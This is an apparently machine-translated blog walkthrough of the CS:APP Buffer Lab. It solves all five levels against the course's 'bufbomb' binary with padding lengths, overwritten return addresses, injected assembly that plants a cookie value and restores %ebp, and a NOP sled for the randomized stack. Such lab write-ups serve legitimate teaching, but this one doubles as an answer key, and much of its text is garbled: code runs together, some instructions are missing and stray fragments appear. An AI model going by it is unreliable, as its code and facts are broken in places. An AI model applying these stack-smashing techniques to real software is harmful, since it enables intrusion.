Csapp Buffer Lab provides an in-depth understanding of the buffer overflow experiment of the computer System (second edition of the original book), which requires the use of buffer overflow principles to solve 5 difficulty increments, namely smoke (level 0), fizz (Level 1), Bang (level 2), Boom (Level 3), KaBOOM (level 4). Deepen the understanding of function calls and buffer overflow mechanisms in practice (for IA-32 architectures).
This record uses the self-study handout version from the original book Companion website, which is http://csapp.cs.cmu.edu/2e/labs.html.
Original course experiment instruction for Csapp Buffer Lab Writeup:http://csapp.cs.cmu.edu/2e/buflab.pdf
About the use of GDB, GCC in the experiment can refer to the author of another blog: Linux editing, compiling, debugging commands summary--GCC and GDB description
The self-study handout version of Buffer Lab is a. Tar packaged file. Unzip can refer to the article Linux file Packaging, decompression instructions--TAR,GZIP,BZIP2
Experiment Preparation:
Extract the directory named Buflab-handout that contains the three executable files:
Bufbomb: A buffer bomb program used to attack;
Hex2raw: Tool used to convert hexadecimal to binary string (may require input not ASCII printable character, with this tool for conversion);
Makecookie: In the experiment is a tool that generates a specific cookie based on the ID and is not used in self-study;
Experimental Analysis: (See the writeup Introduction to buffer Lab for more information)
Getbuf ()
Bufbomb reads the input through a custom Getbuf () function and copies it to the target memory. This function is mainly implemented by the gets () function.
/**/#defineint getbuf ( ) {char Buf[normal_ Buffer_size]; Gets (BUF); return 1 ; }
The Get () function reads the input from the standard input ("\ n" or EOF as the end of the input, does not check the read length) and stores it in the specified memory area at the end of "\ n". Here we know that the target character array buf is 32 bytes long.
Note: The length of the buf array is 32 bytes, but the length and position of the array actually allocated in memory (stack) varies with the compiler, where the executable program is given directly, and the GETBUF implementation can be viewed using the objdump-d bufbomb.
According to the rules of the argument in the function call, we know that the first address of the BUF array will be in the stack before calling the Get function, and the%eax store%ebp-40 is the first address of the BUF array, and it can be seen that the allocated space and the length are not exactly the same! (To satisfy data alignment, the IA32 guarantees that each stack frame has a length of 16 integer multiples). The stack structure of the GETBUF is as follows:
When less than 32 bytes are entered, the output is as follows:
When entering more than 32 bytes, the output is as follows:
General use of the command line./bufbomb-u Idname run Bufbomb, the program generates a specific cookie based on the input idname (see). In the experiment process, according to the experiment request, constructs the input sequence which can realize the specific function (in the computer is the binary form), completes the corresponding five tasks.
Hex2raw: Because the binary string required for the input sequence may not correspond exactly to the printable characters in ASCII, such as when the address is 0x80, the ASCII corresponding character cannot be entered by the keyboard (refer to XXXXX) and can be converted using Hex2raw. Hex2raw reads the hexadecimal string in the input file and converts the two hexadecimal numbers to the binary stream of the corresponding byte, if you want to enter the high address 0x80, write its corresponding hexadecimal representation directly in the input file 80,hex2raw automatically convert it to the corresponding binary sequence. You can use cat filename|./hex2raw| Bufbomb the input constructed string stream, where filename is the file containing the hexadecimal string with the conversion. (note here that the Hex2rax tool provided by the lab is a 64-bit version that can be viewed by the command file Hex2raw.) If you are running in a 32-bit environment, you will be prompted Cann ' t execute binary file:format error. Also, Bufbomb file bit 32-bit version,)
The goal of the experiment is to construct the correct string input and implement a specific function to accomplish five tasks.
Experimental process:
Level 0 Candle (pts)
In Bufbomb, there is a function test (), which calls the Getbuf () function to read the input, and checks whether the stack is broken by the Uniqueval () function, and then outputs accordingly according to the condition after reading.
voidTest ()2 {3 intVal;4 /*Put Canary on stack to detect possible corruption*/5 volatile intLocal =uniqueval ();67val =getbuf ();89 /*Check for corrupted stack*/Ten if(Local! =Uniqueval ()) { Oneprintf"sabotaged!: The stack has been corrupted\n"); A } - Else if(val = =cookies) { -printf"boom!: Getbuf returned 0x%x\n", Val); theValidate3); -}Else {5 -printf"Dud:getbuf returned 0x%x\n", Val); - } +}
Also, there is a function smoke () in the Bufbomb file, and level 0 changes the program flow so that the test function calls Getbuf () and calls the smoke () function directly when the GETBUF () returns, instead of returning the function test ()
void Smoke () {printf ("smoke!: You called Smoke () \ n"); Validate (0 ); exit (0);}
Here, we mainly examine the return of address-related knowledge when a function is called . We know that during a function call, the control jumps to the target function, and the return address (the address of the next instruction at the point of the call) is placed in the stack, and the next instruction of the calling point is resumed at the end of the function call. Here, to call the smoke () function directly at the end of a function call, the main reason is to modify the address of the function call with the return address of the smoke () function . Note that although Test has a canary to check the stack break, the purpose of the task is to switch directly to another function after the end of the getbuf, without checking that subsequent stacks are broken, so you can directly construct a string beyond the length of the array to overwrite the return address to point to the address of the destination function.
From the previous analysis of the stack space of getbuf, if you want to construct a function that overrides the return address, the structure of the string should be a 44-byte padding character (Buf allocated space +EBP) + a new return address.
Through GDB dynamic debugging, we know that the starting address of smoke function is 0x08048c18.
The constructed string is: 0*44 + 8c 04 08. (Small-end method of storage). Constructs a file for Hex2raw conversion, where 30 is the hexadecimal representation of ASCII for character 0, and the last 4 byte-bit small-end method represents the starting address of the smoke function.
The smoke function was successfully called:
Level 1 Sparkler (pts)
There is another function fizz () in Bufbomb, and its source code is as follows. The fizz () function compares the actual participating cookie and succeeds when the cookie is equal to the actual argument. The cookie here is the cookie that is generated by the UserID when you run the./bufbomb-u Uesrid.
void Fizz (int val) {if (val = = cookie) {printf ("fizz!: You Called Fizz (0x%x) \ n", Val); Validate (1Elseprintf ( "misfire:you called fizz (0x%x) \ n", Val); exit (0) ;}
The task of Level 1 is (1) to Modify the GETBUF function to return the address to the fizz () function instead of the return function test () and (2) to verify success in Fizz (), which requires the value of the cookie to be passed as a parameter;
The main research here is about the function of the parameter transfer knowledge.
Lower left Image:
(1) For parameters of the called function, the function call will be the parameters in the right-to-left order into the stack, and then in the function called through%ebp+8,%ebp+12 and other addresses to obtain the arguments of the function call.
(2) The function call command calls the return address of the function into the stack, the function will be the original function of the stack frame pointer stored in the%EBP value into the stack, and the new%ebp value equals%ESP, so that the%ebp point to the function of the stack frame, so that the new% The address of EBP points to the%EBP and return address stored at the interval of the function's parameters, so the first parameter of the function can be obtained by%ebp+8
Image on the right:
(1) The left arrow identifies the%ESP position. When the function returns, the%EBP value is first assigned to%ESP, and the top of the stack is position (1). After the push%EBP, the%EBP is restored,%esp in position (2). The last RET command resumes the return address,%esp points to position (3);
(2) Due to the need to return the fizz function, the return address has been modified to fizz address. Note there is no call instruction, no return address into the stack. The fizz function executes as normal, and its stack starts at the red line. First put the%EBP into the stack, the new%EBP position. The fizz function normally takes its parameters according to the position of%ebp+8, so the position (1) in the diagram stack should be overwritten with the cookie value;
The constructed input string should be: 44 padding bytes + Fizz function Start address + 4 padding byte + cookie value. The starting address of the fizz function can be viewed using GDB, where the cookie value is the value generated by the Bufbomb, which is noted using the small-end method.
The constructed string is: 0*44 + 8c (Fizz start address) + 0*4 +da 3e PNS (cookie).
Results:
Level 2 Firecracker (pts)
The more complex way to construct the input string is to include the machine language code with the actual functionality in the string and modify the function's return address to point to the constructed code, thus executing this code to implement the SET function.
There is a function bang in bufbomb, and the function validates the value of the cookie and the argument, validates the result, and outputs the value of the global variable Global_value.
intGlobal_value =0;voidBangintval) {if(Global_value = =cookies) {printf ("bang!: You set Global_value to 0x%x\n", Global_value); Validate (2);} Elseprintf ("Misfire:global_value = 0x%x\n", Global_value); Exit (0);}
The task of Level 2 is to: (1) Modify the value of the Global_value to the value of the cookie by executing the machine instruction of the input construct , (2) after the test function calls Getbuf () as performed in level 0, the GETBUF () Call the fizz () function directly on return, instead of returning the function test ();
The key to the task is how to construct the machine code, and make the program jump to the input machine code, and pay attention to the function bang parameter passing process .
To construct the input string process:
(1) global variable Global_value in the process of program execution, the logical address does not change, can be directly in gdb to get its address, using the MOV instruction to assign value;
(2) The return address of the GETBUF function is modified to point to the beginning of the constructed machine code, where the starting address of the BUF array is located;
(3) Since the return address of the GETBUF function has been used to point to the machine code of the input, it is necessary to use additional instructions to jump to the implementation of the Bang function. Because the program is compiled, the logical address of the Bang function is not changed, so it can be called directly using the logical address. Use push to put the Bang function address into the stack, and then use the RET instruction to jump. (The push instruction puts the data at the top of the stack, RET takes the data at the top of the stack and jumps it as an address);
(4) It is necessary to pay attention to the parameter passing process of function bang. Before the level 0 with Level 1, the machine code is stored in the code snippet, indicated by the PC, data operation on the stack, indicated by%ESP. After the first jump in Level 2, the machine code being executed is located in a buffer on the stack, indicated by the PC, and the data operation is also on the stack, indicated by%ESP, where it is necessary to pay attention to the difference between the two, the former is used for execution, the latter for operation. The%ESP and PC positions are shown after the function ret instruction. Similarly, the transfer of function parameters can be referred to level 1 or directly using the%ESP + 4 addressing assignment;
Constructs the input string: the executable machine code + padding character + points to the address of the input machine code.
The starting address bit 0x08048c9d of the bang function is obtained through GDB.
Similarly, in the disassembly of the Bang function, the value of 0x804d100 and 0x804d108 is compared, the 0x804d108 of the address is found, and the cookie is stored, and the 0x804d100 is the value of the global variable Global_value.
Set a breakpoint inside the GETBUF function and run inside the function to get the starting address of the BUF array 0x55683978. (Note that in order to run inside Getbuf is due to the need to make%EBP point to the getbuf stack frame, so%ebp-40 is the first address of the BUF array, otherwise the direct output%ebp-40 may point to other places)
The constructed executable code is:
MOV $0x373e31da,0x804d100 0x804d100,%%eax,4(%ESP) #将global_value的值作为实参放置在栈中作为bang的参数push $ 0x08048c9d #将bang函数起始地址入栈, pay attention to the way the constants are written, plus $ret #将栈顶数据作为地址进行跳转
The appeal assembly instructions can be compiled, the compilation method is visible in the last part of the experiment writeup, and then the Objdump or GDB disassembly is used to get the hexadecimal representation of the required machine code. (Note that the code in this and GDB does not explicitly give the instruction suffix B, w, l, Q, but you need to add a suffix in the actual writing to compile)
The input string actually used, where executable code (25bytes) + padding character (19bytes) + Array header address (4bytes)
The result after execution is:
Level 3 Dynamite (pts)
So far, the operation is to make the normal control flow change and jump to other functions, the end of the program to stop, so the above operations for the stack of damage, the destruction of the value of the operation is acceptable for the program to run. A more complex buffer attack is to perform certain constructs that alter the register or memory values and enable the program to return to the original control flow execution normally. The task of Level 3 is to construct the instruction so that Getbuf returns to the test function normally and causes the Getbuf return value to be the cookie value .
The following points need to be noted:
(1) The structure of the machine instruction is stored in the GETBUF buffer, want to execute the input construction code, only modify the address of the GEUBUF function return, note that when the jump to the construction code at the execution, Getbuf is already finished, the return value 1 is stored in the Register%eax; It is at the end of the RET instruction to jump to the modified address)
(2) Recall the function call procedure, the call command calls the function to place the return address on the top of the stack, the first step after entering the function is to save the%EBP, so that overwriting the change in the return address will overwrite the saved%EBP is also overwritten. At the end of the GETBUF function, the value of%ESP is assigned to the value of the GETBUF stack frame pointer%ebp (mov instruction), and then the saved%EBP value is assigned to the Register%EBP. As mentioned earlier, the saved%EBP is overwritten when the return address is overwritten, so%EBP will be an arbitrary value;
(3) due to the requirements of the topic is the normal return test function, and the function has a certain buffer coverage check (Uniqueval function), it may be necessary to pay attention to the length of the constructed string;
As mentioned above, the constructed string should complete the function of: (1) Modify the storage%eax of the return value, (2) The value of the recovery register%EBP is normal, here is the stack frame of the test function, (3) Place the Getbuf normal return address on the top of the stack, and return the test function through the RET instruction.
With GDB debugging, set a breakpoint inside the GETBUF function to see the saved return address, saved%EBP, and other information. P $EBP Get information about the GETBUF stack frame pointer, and then use X/2xw $EBP to get the value of two consecutive 4-byte spaces starting at address%EBP (recall the GETBUF stack structure, which holds the saved%EBP and return addresses). Get returnaddress for 0x08048dbe, save%EBP for 0x556839d0.
The constructed executable code is:
MOVL $0x373e31da,%eax #修改返回值为cookie值movl $0x556839d0,%ebp #恢复被破坏的保存的%ebp value Push $0x08048dbe #将返回地址入栈 ret #跳转
The string sequence sequence is constructed as follows, where the construction Code (16 bytes) + padding character (28 bytes) + Modified return address, that is, the array start address (4 bytes)
The results of the implementation are as follows:
Level 4 nitroglycerin (pts)
For a given program, the stack location is different for each run of the program, especially when it is run by different users. There are many reasons for the change of the stack position, one of which is that all necessary environment variables are placed at the bottom of the stack (high address cells) as strings when the program is running. For different values of the environment variables, the required stack space is naturally different, so that the stack position changes, for different users this point is more significant. Accordingly, it is possible for the program to run naturally with a stack location that runs in the GDB environment, as the data needed to run the GDB itself is placed in the stack.
For the GETBUF function, its built-in stack space stability features, so that the buffer attack can be directly obtained the required address data, and the direct use of the way to write machine code, which greatly reduces the difficulty of implementation. And this is too ideal in practical application situations. For level 4, you need to use the- n option when starting Bufbomb , so that the stack space is no longer stable, and based on the buffer overflow principle of the experiment.
When the program runs with the-N option enabled, the program will enable the GETBUFN function (instead of the preceding getbuf) when reading the input. The GETBUFN function has a function similar to GETBUF, but the input array has a length of 512 bytes. Before calling the GETBUFN function, the program allocates a random length of space on the stack, so that the stack space of the GETBUFN function is no longer fixed in different calls, in fact the difference of%EBP is up to ± 240. Also, when the-n option is applied, the program requires that the input string be submitted 5 times, 5 times the input will face 5 different stack spaces, and the cookie value is required to be successfully returned each time. Level 4 's task is consistent with level 3, which requires the GETBUFN function to return the cookie value when the calling function Testn, rather than the regular 1.
Here the operation of the program is added to the stack randomization operation, that is, before the program call, the first allocation of a random size of space, the space program is not used, but the length of the variable, so that each runtime of the stack space changes (mainly in the case of the stack relative structure, the address of the elements in each stack changed) , see Figure I. The significant impact of this operation is that the method previously used to overwrite the GETBUFN return address with a fixed new return address is limited. Because each stack space is different, the input machine code starting position is also different (recall above, each time the machine code is placed at the beginning of the input string, so that each modification of the return address as the input array start address can execute the construction code, where the input array starting address is fixed), It is difficult to specify the address of the construction code directly.
Here the decoding of the stack randomization is mainly aided by the operation of the "empty Operation Sled" (NOP sled). The so-called NOP sled is to add a NOP instruction (no operation abbreviation, machine code bit 0x90) prior to the construction of the machine code, which functions only to increase the PC without performing any operation. In this case, as long as the overridden address can point to any address in the NOP sequence, the NOP instruction can be executed sequentially until the actual constructed machine code is encountered, in which case the requirement for the return address for the overwrite is reduced.
The constructed string bit: NOP instruction string + constructed machine code + return address. During the operation of this experiment, we mainly cover by determining a fixed return address.
Looking at the implementation of the GETBUFN function, we can see that the allocated length bit of the array is 520 bytes (0x208), overwriting the return address needs to fill 520 (array length) + 4 (saved%ebp) = 524 bytes.
View the values of the%EBP by using the P $eax, and x/2xw the values of the saved%EBP and return addresses through the $EBP.
The idea of solving problems is as follows:
(1) In order to achieve the purpose of returning the cookie value to the TESTN function, it is also necessary to GETBUFN modify the return address so that it executes the constructed code, including the modification of the return value, Recovery%ebp, return TESTN function three steps;
(2) in step (1), modifying the return value as%eax and returning the TESTN function is the same as Level 3. Always change the return value to a cookie, return the address of the TESTN function is always the same (note that the program is applied to the stack randomization operation, the impact is the address on the stack space, executable code is stored in the code snippet, in the context of the problem is not affected);
(3) The question of how to recover the covered%ebp. Stack randomization is the allocation of an indefinite amount of memory space on the stack, which changes the address of the elements in the stack. However, since the program always performs the same operation, the relative position (distance) of the elements in the stack used by the program does not change under different execution conditions, so you can try to recover%ebp. The recovery process is performed by the input construction code, at which point the%EBP has been given a "scrap value" (see Level 3 analysis), but%ESP is a valid value that can be rolled out by%esp the saved%EBP value of the overlay. The values of the saved%EBP and%EBP obtained from above can be seen in the difference value of 0x38.xxxxxxxxxxxxxxxxxxxxxxx
Figure
The constructed string sequence is: NOP instruction string () + Executable code snippet () + Address to overwrite (4 bytes)
When you confirm the input for debugging, you can set breakpoints at 0x0804921b and after the call instruction, respectively, corresponding to the state before and after reading the input, to verify whether the constructed string produces the expected effect.
The following is a change in the stack space of the two run times in the process of debugging a program with GDB. As you can see, in two runs, the%EBP and saved%ebp have changed, and the return address has not changed, because the return address points to the code that is located at the fixed position of the snippet, not affected by the stack randomization, but the data on the stack is affected.
The constructed executable code is:
MOVL $373e31da,%%esp,%ebx addl $0x28,%%ebx,%EBP//%ESP value according to%EBP worth to restore PUSHL $0x08048e3a ret//Jump to original function
The constructed input string is: NOP instruction string (506 bytes) + Construction Instruction (18 bytes) + New address for Overwrite (4 bytes)
The end result is:
Csapp Buffer Lab Records--IA32 version